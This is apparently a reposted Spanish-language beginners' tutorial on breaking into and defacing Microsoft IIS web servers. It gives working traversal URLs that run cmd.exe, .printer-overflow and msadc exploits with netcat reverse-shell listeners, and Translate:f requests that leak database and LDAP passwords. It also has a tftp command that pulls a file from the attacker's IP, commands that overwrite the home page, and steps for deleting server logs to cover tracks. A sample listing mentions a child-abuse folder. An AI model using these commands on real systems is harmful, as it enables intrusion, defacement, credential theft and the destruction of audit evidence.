1. Introduccion & Disclaimer:
Ke onda raza, escribire este simple manual, no por que no tenga nada mas que hacer
mas bien para todos los Newbies y que quieran aprender hacerle deface, etc.. a los
IIs servers ( Internet Information Server ) ya que el IIs es el webserver por defecto de los
NT , Win2k Server, etc. pero no siempre esos Os's traeran ese webserver unos traen
apache (win32) o Lotus Domino. etc. Bueno en este tutorial solo hablare de unas cuantas
vulnerabilidades. ( no todas las ke hay).
A. Disclaimer:
No soy y ni me hare responsable por lo que hagan con esta informacion en este tutorial.
Es solo para fines educacionales. :p
B. Podran distribuir este tutorial en otros sitios con que nomas no se altere el contenido
sin el consentimiento mio y menos cambiar los creditos, O ver otro manual iwal demasiado
parecido al mio. El credito es para IpMazter ipmaster@icestorm.com | www.securenterprise.org
bueno empezemos .!
2. Como hayar servers corriendo IIs webservers:
Pueden buscar cada sitio ke vean ke es lo ke ese site corre. ( no se los recomiendo duraran mucho)
o se pueden bajar un scanner como el Grabbb pa linux ke con solo poner un rango de ip's y el puerto
ke kieren hayar como por ejemplo:
[root@maximus ipmazter]# ./grabbb
grabbb 0.0.1 by scut of teso
usage: ./grabbb [options]
Entonces agarramos un rango de una sub-red la ke ustedes se les antoje.
Ok supongamos ke tienen unos cuantos sites pa ver ke ke onda! pos tenemos ke saber
que webserver corren esos sites podemos usar ( www.netcraft.com ) pa ke nos diga el Os
y el Webserver ke corre ese site ejemplo:
The Site www.victim.com is Running Microsoft-IIs/5.0 on Windows 2000
Eso fue facil y rapido :) pero hay mas maneras pa saber ke Webserver estan usando ese sitio.
Tambien podriamos usar Nmap para ( *.nix ) si es ke lo tienes en tu makina linux o desde tu shell
ke tengas. veamos : tienes ke ser r00t pa poder ver el Os del sistema operativo ke estas scaneando.
[root@maximux ipmazter] # nmap -v -sS -O www.victima.com
Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/)
Host (209.23.1.xxx) appears to be up ... good.
Initiating SYN Stealth Scan against ( 209.23.1.xxx)
Adding open port 80/tcp
Adding open port 443/tcp
Adding open port 1025/tcp
Adding open port 25/tcp
Adding open port 5631/tcp
Adding open port 1030/tcp
Adding open port 3389/tcp
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 21/tcp
The SYN Stealth Scan took 44 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled.
Interesting ports on (209.23.1.xxx) :
( The 1539 ports scanned but not shown below are in state: closed )
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http <--------- the one we need here open !
135/tcp open loc-srv
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1030/tcp open iad1
3389/tcp open msrdp
5631/tcp open pcanywheredata
Remote operating system guess: Windows NT4 / Win95 / Win98
TCP Sequence Prediction: Class=trivial time dependency
Difficulty=3 (Trivial joke)
Etc.. como veran ese OS es un NT4 y pos como webserver tiene el IIs 4.0
Tambien Netcat te puede dar informacion sobre los webservers de un sitio.
ejemplo:
c:\nc>nc -vv www.victima.com 80
www.victimsite.com [209.xx.xxx.xx] 80 (http) open
GET / HTTP/1.0
[CRLF] <--- ke le aplastes enter unas 2 veces.
[CRLF]
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrectsent 2, rcvd 224 : NOTSOCK
etc.. obtendran un resultado parecido si es ke es un IIs.
como podran ver nos dice ke es un IIs 5.0 el sitio ese.
O puedes crear un texto preconfigurado con informacion ke puede
ser redireccionada con el netcat pa ahorrarse uno mas tiempo.
Creamos un texto llamado iis.txt ke contenga estos comandos:
GET / HTTP/1.0
[CRLF]
[CRLF]
y redireccionarlo atraves de Netcat Ejem:
c:\nc>nc -vv www.victima.com 80 <\ iis.txt
Los resultados seran como en el ejemplo anterior!
Bueno ahora tenemos un IIs 5.0 al parecer... entonces ke hacemos? umm
hay que checar el sitio con varias vulnerabilidades como el " decode"
IIs 5.0 printer Overflow, Translate: f , masadc2.pl , etc..
solo esas fallas veremos en este tutorial. asi ke veamos:
Nos bajamos un decodecheck.pl ( un perl script) ke cheke si es vulnerable
el sitio ke keremos scanear , pero primero tendras ke tener un compilador
de perl pa poder usar el programita ese. te puedes ir a www.activestate.com
o bajalo de la web de www.securenterprise.org en la seccion de downloads y luego
free software. esta ya linkiado el download.ok continuemos.
chekemos el sitio con el programa del decodecheck.pl ke tenemos.
C:\Perl\bin>perl decodecheck.pl www.victim.com:80
Testing www.victim.com:80 : Vulnerable
Uyy! como podran darse cuenta hayamos un server vulnerable al decode :)
los programas ke kieras correr de perl en win32. ponlos en las carpetas
perl y luego en Bin y usalo en ms-dos como ahi podras ver.!
O tambien la forma facil de volada si es ke no tienen el programa ese
a la mano.. pongan el string mas facil y corton en su web address Ejem:
www.victima.com/scripts/..%255c../winnt/system32/cmd.exe/c+dir+c:\
enter y si les sale algo como a continuacion van bien hasta ahorita!
Traten de usar proxies es recomendable al menos ke estes en un cybercafe hoho!
podran hayar suficientes en www.cyberarmy.com/lists.
bueno espero y les salga algo como esto a continuacion:
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ah ke bien ya tamos adentro, cheken por mas particiones en el server
puede ke no nomas sea C: sino d: o los 2 o hasta mas g: f: etc..!
Tambien podemos usar Netcat pa ke nos salga eso , haciendo lo mismo ke la ves
pasada creamos un texto llamado decode.txt y le ponemos la siguiente string:
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
[carriage return]
[carriage return]
Y esto mas o menos sera el resultado a la hora de redireccionarlo con Netcat:
c:\nc>nc -vv www.victim.com 80 <\ decode.txt
www.victim.com [195.23.43.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIs/5.0
Date: Mon, 15 June 2001 16:03:35 GMT
Content-type: application/octect-stream
Volume in drive C has no label.
Volume Serial Number is 8631-765F
Directory of c:\
01/15/02 11:17p DIR kid porn files
12/19/01 03:14p DIR dame
11/12/01 12:19p 656,018 Exchange Server Setup.log
11/12/01 11:16a DIR ExchSrvr
12/10/01 08:54a DIR INetPub
01/27/02 12:00a DIR InterScan
12/20/01 12:39p DIR InterScan eManager
01/27/02 08:51p DIR Ipmazter_was_here
11/12/01 11:06a 17,178 mpssetup.log
11/12/01 11:06a DIR MSP
11/14/01 08:28a DIR oracle
Ya ven ahi ta !! :)
Tambien pueden obtener algo parecido al ejemplo anterior y ejecutar comandos
a la ves tambien con el decodexecute2.pl ejem: ( tamos usandolo desde linux).
[root@maximus ipmazter]# perl -x decodexecute.pl www.victim.com:80 'dir'
Executing dir on 209.34.65.xxx:80
HTTP/1.1 200 OK
Server: Microsoft-IIs/4.0
Date: Mon, 23 May 2000 01:23:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label
Volume Serial Number is F984-772F
Directory of C:\Inetpub\scripts
12/10/01 08:54a DIR..
01/27/02 12:00a DIR...
2 file(s) 10 bytes
15,345,324 bytes free
Bueno parece ser ke podemos ya ejecutar comandos, ya lo ke hagan de ahi
es problema suyo , usen su imaginacio. :D
-----------------------------------------------------------------------------
Todo lo anterior fue con la falla del decode , ahora veremos la falla del
IIs 5.0 printer overflow. ( jill.c ) veamos ocupamos el exploit llamado jill.c
ke lo puedes bajar de la pagina de securenterprise bajo la seccion de exploits
Y jill.c se corren en *nix ya tengas una shell o tu makina con linux.
Aunke tambien hay una version de ese exploit para win32 llamado IIs5-Koei
que lo puedes bajar tambien en la misma seccion ke del jill.c ..Ocuparas el
Netcat tambien aki y aki si es de afuerzitas. ahorita veran porque..
Ahora vemos como usaremos la falla del printer overflow y usaremos primero
el exploit version del win32 llamado IIs5-Koei..
solo tienen ke poner la web del server IIs 5.0 ke kieren ver si es vulnerable
y enter, pero primero poner tu netcat en escucha en el puerto 7882 por ke
ese puerto te dice el programa ke uses. :
c:\nc>nc -v -v -L -p 7882
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 7882... <-- ahi ya esta en escucha en ese puerto.
si llega a ser vulnerable el sitio ese. te mandara una shella tu pc y veras
algo como esto Ejem:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Como pueden ver ya tienen acceso al server como NT Authority\system.
Ahora miraremos como se usa el jill.c bajo linux :D
compilamos el exploit y veremos el usage!..
[root@maximus ipmazter]#cc jill.c -o jill
[root@maximus ipmazter]# ./jill
iis5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
usage: ./jill
Ok bueno el exploit asi se usa tienes ke poner a netcat (pa *nix) en escucha
en el puerto ke kieres ke este en escucha. aki usare el 2003.
[root@maximus ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
ok ya esta ahora ejecutar el exploit...!
[root@fbi.gov ipmazter]#./jill 209.victims.ip 80 200.your.ip.addr 2003
IIs5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
Connecting...
Sent...
You may need to send a carriage on ur listener if the shell doesnt
appear ok ! <-- ese mensaje te saldra automaticamente ke le aplastes
enter unas 2 veces en donde tienes el listener pa ver si te da la shell.
si te sale algo asi ya pudistes!
[root@fbi.gov ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
connect to [209.xx.xxx.xxx] from etc [209.xx.xxx.xx] 1117
[ carriage return ]
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM
Bueno ya vemos ke si agarro y ya tamos adentro ahora ya tenemos acceso
como NT AUTHORITY\SYSTEM y ahi pueden ver hize un " whoami" pa ver ke pex.!
------------------------------------------------------------------------------
Ahora hablaremos de la vulnerabilidad translate: f , es explotada por otro
IIs 5,0 ISAPI.DLL, httpx.dll, ke implementa Web Distributed Authoring y
Versioning IIs 5.0. WebDav is a microsoft-backed standard ke especifica
como autores remotos pueden editar y manejar Web Server Content por http.
Aki podemos hacer otro texto preconfigurado usando netcat como lo hemos
hecho ya anteriormente.
GET /global.asa\ HTTP/1.0
Translate: f
[CRLF]
[CRLF]
y redirecciona el texto ke hagas atraves de netcat al site vulnerable,
el source code del global.asa aparecera en texto. llamemos el texto ke
redireccionaremos ( fvul.txt )
c:\nc>nc -vv www.victim.com 80 <\ fvul.txt
www.victim.com [209.23.54.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: application/octect-stream
Content-Length: 2790
Etag: "3874fdf79dff:kio"
Last-Modified: Mon, 21 Jan 2002 09:30:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache
<\objectRUNAT=Server SCOPE=Session ID=fixit PROGID="secure.object\">
("ConnectionText") = "DSN=phone;UID=stalker;Password=fuckoff
("ConnectionText") = "DSN=Backend;UID=stalker;PWD=test;"
("LDAPServer") = "LDAP://ldap.secureco.com:389"
("LDAPUserID") = "cn=Admin"
("LDAPPwd") = "Password"
Como podran ver , hemos agarrado los passwds de multiples servers , incluyendo
un LDAP system. Ya hay un perl script ke te lo hara esto mas facil aun se llama
srcgrab.pl ( Srcgrab.pl exploits the Translate:f bug. la vulnerabilidad presente
en los IIs4.0 y 5.0 y Windows 2000 frontpage extensiones, hace ke un atacante
remoto vea el source code de las paginas .asp y .asa del server victima.
---------------------------------------------------------------------------------
Ahora hablaremos sobre la falla del msadc/rds. y esta sera la ultima de este
tutorial. hay un exploit llamado msadc2.pl ya listo en la red y lo puedes hayar
en securenterprise en la seccion de perl scripts. esta falla te deja ejecutar
comandos arbitrarios al webserver IIs 4.0. ahorita veremos un simple ejemplo
de un deface con el masdc2.pl a el server victima. si nos sale cmd/c !!
kiere decir ke ya la hicimos a lo mejor! el ejemplo sera en linux!
[root@fbi.gov ipmazter]# perl -x msadc2.pl -h www.victim.com
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c echo IpMazter Ownz Ur site > c:\inetpub\wwwroot\index.htm
(asumiendo index.htm es la pagina principal de www.victim.com )
como ven solo le hice un echo al index. lo mas facil.!
TIP: ahora no solo por ke con el decode o con cualkiera otro de estos diga
"vulnerable " wow! poss nel.. todavia hay ke ver si tiene write access el web
folder. :( . asi es como podemos saber . aki usare la falla del decode pa ke vean
ya ke es la mas kemada de todas :).. hehe.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
asi de simple pa saber si tiene acceso de escritura. no tiene ke ser siempre
el folder de scripts , hay muchos mas. en cualkier parte de la red pueden ver las
demas strings.
www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
ok aki de nuevo si te sale algo como esto kiere decir ke vas bien:..
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(1) files copied.
:) bueno vamos muy bien.parace ke si tenemos acceso de escritura en el server.
si les sale algo como en ves de lo anterior y ven esto:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(o) files copied <-- no acceso de escritura ya te chingastes mejor vete
a ver ke otro hayas :(
tambien podemos hacer este tambien o los 2 , etc.
www.victim.com/scripts/..etc.../c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd2.exe
si dice iwal ke arriba ke (1) files copied , perfecto!!
----------------------------------------------------------------------------------
Ahora trataremos de subir nuestro hack.html en este caso pa hacerle deface.
puedes usar tu ftp de tu pc ke ya trae por defecto , o bajarte un cliente de ftp
como ws ftp pro o ftp serv-u aunke ese esta mas bien pa cuando haces defaces a los
*nix. luego lo comentare en el siguiente texto de defacing linux , etc.
Aki muestro un ejemplo facil con el ftp por defecto de la pc de uno.
ojala ke tenga acceso anonimo y tenga un directorio con acceso de escritura
C:\>ftp
ftp> open
To www.victim.com
Connected to www.victim.com
220 home Microsoft FTP Service (Version 3.0).
User (www.victim.com:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password
Password:
230 Anonymous user logged in. <-- acceso anonimo perfecto
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
dwnload
iomega
kerner
LAserJ5L
napv2b7.exe
Netscape.exe
226 Transfer complete. <-muy bien!
ftp: 62 bytes received in 0.16Seconds 0.39Kbytes/sec.
ftp> put hack.html
200 PORT command successful. <-- si dice 550 hack.html acceso denegado , entonces usaremos otros metodos.
150 Opening ASCII mode data connection for 'hack.html'.
226 Transfer complete.
ftp: 1235 bytes received in 0.64Seconds 0.45Kbytes/sec.
ftp> put hack.jpg
200 PORT command successful.
150 Opening ASCII mode data connection for 'hack.jpg'.
226 Transfer complete.
ftp: 1300 bytes received in 0.15Seconds 0.35Kbytes/sec.
ftp> quit
221
Ahi como pudieron ver como subi el hack.html y la foto ke ira en el deface!
Ahora veremos con lo del decode donde jodidos esta nuestro .html
mayoria de veces uno lo hayara en c:\inetpub\ftproot , veamos:
Directory of c:\Inetpub
02/28/01 02:15p DIR .
02/28/01 02:15p DIR ..
05/04/01 10:46a DIR ftproot
05/04/01 11:36a DIR gophroot
03/03/02 03:26a DIR scripts
02/28/01 02:16p 722 site_definition.wst
03/03/02 02:37a DIR wwwroot
7 File(s) 722 bytes
ahora escalemos al dir de ftproot :D
Directory of c:\Inetpub\ftproot
05/04/01 10:46a DIR .
05/04/01 10:46a DIR ..
05/04/01 10:46a DIR dwnload
03/03/02 11:54a hack.html <-- ahi esta nuestro html =)
03/03/02 11:54a hack.jpg
11/30/00 06:03a DIR iomega
05/14/01 10:46a DIR kerner
11/30/00 06:03a DIR LAserJ5L
08/22/00 07:13a 1,696,777 napv2b7.exe
08/28/00 09:05a 20,002,801 Netscape.exe
10 File(s) 21,699,578 bytes
454,900,736 bytes free
ahora ke ya lo tenemos arriba en el server , primero debemos saber donde jodidos
esta la web ..
www.victim.com/scripts/..%255c../winnt/system32/cmd.exe?/c+set
y obetendremos algo como esto..:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=SERVER_SII
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=en-us
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.victim.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StarBand Version 2.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=your.ip.address.hehe <- or the proxy ip.
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\DMI\win32\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
PATH_TRANSLATED=C:\Inetpub\wwwroot\ <-------------ahi esta el dir. de la web :)
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
Nunca siempre estara donde mismo el directorio por defecto es el
c:\inetpub\wwwroot\ylaweb.html
ahora pueden ir a ese dir. y ver donde esta el index.html o el default.htm
pero muchas veces veran un monton de .html's .asp's etc.. htm's. y dices utta!!
cual de todas seran ingao !!muy facil! vete al www.sitio.com. ya ke estas ahi
calale con los nombres de las paginas mas kemadas ke hay
www.site.com/index.html <-- asi escribelo tu
www.site.com/index.htm
www.site.com/default.htm
www.site.com/default.asp
etc....
pero la ke se aparesca como ejem: www.site.com/index.htm entonces la web
se llama index.htm y como ya sabes donde esta pos dale gas rapidin.:)
puede ke los dir. de donde esta la web varee . por ejemplo en ves de estar en
c:\inetpub\wwwroot puede estar en d:\inetpub\web\keves\akinoesta\
etc.. hehe! por eso te servira un poco el comando del set. pa y mirar el
path_translated y te diga donde esta situada la web principal
Y si nomas no das una con hayarla puedes hacer un search por la web ejemplo:
www.victim.com/etc....etc.. cmd.exe?/c+dir+/S+c:\*.html
y te saldra algp parecido a esto..:
Directory of c:\Dell\Drivers\28693
07/30/99 11:22a 857 Setup.html
1 File(s) 857 bytes
Directory of c:\InetPub\WWWroot\samples
07/26/00 10:16a 1,548 index.html
1 File(s) 1,548 bytes
y saldran massss!! hehe. ahi tu te las ingenuas !
ok ahora ke ya sabemos ke se llama index.htm ok.. y ke esta en el dir. de
c:\inetpub\wwwroot\ pos es hora de copiar nuestro hack.html ahi :)
www.victim.com/scripts/..%255c../inetpub/scripts/cmd2.exe?/c+copy+c:\inetpub\ftproot\hack.html+c:\inetpub\wwwroot\index.html
si te sale solo el error de CGI esta bien ! si te sale algo de access denied pos
kiere decir ke no tiene acceso de escritura el web folder y te la has pelado :(
como pueden ver ahi copie mi hack.html de ftproot por ke ahi estaba y lo mande al
dir. de la web original del server. hagan los mismo con la foto!
ahora metete a www.site.com , dale refresh y si sale pos felicidades y si no pos
ya te jodistes! o algo anda mal. ve y checa de nuevo en ke podistes haber fallado.
Ahora supongamos ke no podistes subir por ftp. por ke no tenia acceso anonimo el
el ftp o si tenia pero no habia directorios con escritura y no podias hacer
uploads al server. :( o simplemente ni ftp tenian o lo tienen firewalled etc..
Usaremos tftp ( trivial file transfer protocol / es el puerto UDP 69)
ese puerto tambien puede ke este deshabilitado por el admin o este firewalled, etc
bueno supongamos ke no hagamos lo siguiente.. bajemonos el cliente de tftp
pueden hayarlo en mi web de securenterprise, bajo free software.
instalemonos en nuestra pc y configuremoslo. etc.. el comando seria asi. ejem:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+tftp+-i+Your.Ip.Adrres.+GET+hack.html+c:\inetpub\wwwroot\index.html
Ya ves lo subimos por tftp y lo copeamos en el dir. domde kieras o en ese. ahi tu
luego lo acomodas si lo pones en otro folder.
Ahora si asi tampoco se llegara a poder ingaoo!! pos usaremos el echo command
es muy facil y simple. mayoria de gente webas lo usa! hehe
POdemos calar si podemos hacerle echo al index , y esto como prueba:
www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+echo>+>c:\inetpub\wwwroot\hoho.html
ahi esta el comando de prueba. si no algo de acceso denegado o otra mensada vas
bien, y vete si kieres a www.site.com/hoho.html y veras ke dira " Echo is on"
kiere decir ke de seguro podremos hacerle echo al index.html :)
www.victim.com/...etc../inetpub/scripts/cmd2.exe?/c+echo+
Hacked!
defaced By
by
IpMazter
"+>c:\inetpub\wwwroot\index.html
como vemos en ese comando de echo le meti codigo html pa ke se vea mejor aun
el deface con el comando del echo. :)
O uno simple nomas www.site.com/..etc../inetpub/scripts/cmd2.exe?/c+echo+IpMazter hacked you+>c:\inetpub\wwwroot\index.html
y ya vayanse a www.site.com y refresh y ya veran!!el simple deface . bueno es todo
por ahorita sobre defacing IIs servers ( Winblowz) hehe. ahora borremos LOGS!!
Ok mayoria de logs los hayaras en :
www.victim.com..etc.,,,/c+dir+c:\winnt\system32\logfiles
or
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
ahi los veras tu.. estan asi de esta manera :
in020321.log or ex020321.log etc..
in020321.log = year 2002 the 03 for march the date 21 :)
Un simple ejemplo de como se ve :
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1
Directory of c:\winnt\system32\logfiles\w3svc1
02-03-21 01:48p DIR .
02-03-21 01:48p DIR ..
00-09-05 12:18a 423,909 in000904.log
00-09-06 12:00a 571,107 in000905.log
00-09-07 12:00a 771,947 in000906.log
00-09-07 03:49p 196,608 in000907.log
00-09-09 12:00a 474,393 in000908.log
00-09-10 12:01a 1,114,833 in000909.log
00-09-11 12:00a 455,745 in000910.log
00-09-12 07:00a 360,205 in000911.log
ahi tan los logs!! uyy a borrar solo los ke creemos ke debemos borarr
TIP: varias veces no podras el del dia mismo ke estas en el sistema,
pero borra el de ayer si kieres etc.. pa ke veas si puedes borrarlos.
y ya al dia siguiente entra y borralo. el del dia ke estuvistes haciendo
el desmadre si es ke el admin. no lo parcho ya! de inmediato. etc..
cuando no puedas veras algo como asi ejem:
CGI Error
The specified CGI application misbehaved by not etc,,,,
c:\winnt\system32\logfiles\w3svc1\in020321.log
The process cannot access the file because
it is being used by another process.
utts!! :( ni pex hasta ke pegue la 12am pa borrarlo hehe
o si traias proxy ke te valga de borrarlos.
ahora aki ta el comando pa borarr los logs :
www.victim.com/...etc../c+del+c:\winnt\system32\logfiles\w3svc1\in020320.log
enter y enga!! ya se borro .
Ahora ke ya le haygas hecho deface ahora mandalo a archivar claro ke no sea
un redefacedments por ke se ve lame! lo archivas en defaced.alldas.org
email= defaced@alldas.org o a www.zone-h.com ahi veras como se mandan ahi
pa archivarlos :)
Bueno ya me harte aki hay varios comandos pa ke se diviertan les puede servir
de util en algo kien sabe :
--------------------------------------------------------------------------
www.victim.com/...etc.../winnt/system32/net.exe?view+ /domain
www.victim.com/...etc../winnt/system32/net.exe?view
www.victim.com/..etc../winnt/system32/tracert.exe?IP
www.vicitm.com/..etc../winnt/system32/ping.exe?IP
www.victim.com/..etc......./c+md+c:\IpMazter_was_here -- create a directory
www.victim.com/..etc......./c+copy+c:\loko.txt+c:\users\texts -- copys loko.txt to that directory
www.victim.com/..etc......./c+type+c:\loko.txt -- see whats inside O_O
www.victim.com/..etc......./c+del+c:\loko.txt -- deleting
www.victim.com/..etc......./c+copy+c:\loko.txt and then www.victim.com/scripts/loko.txt
hay mas maneras de hacer un download:)
Bueno aki les mando unos links etc,, y las tools ke se usaron aki no todas casi
nmap: www.insecure.org/nmap
netcat: www.securenterprise.org/downloads/tools/nc11.nt.zip
netcat for linux: www.securenterprise.org/downloads/tools/nc110.tar
decodecheck.pl: www.securenterprise.org/downloads/perl/decodecheck.pl
msadc2.pl : www.securenterprise.org/downloads/perl/msadc2.pl
srcgrab.pl: www.securenterprise.org/downloads/perl/srcgrab.pl
jill.c : www.securenterprise.org/downloads/exploits/jill.c
decodexecute.pl : www.securenterprise.org/downloads/exploits/sensedecode.tgz
Cap comentari:
Publica un comentari a l'entrada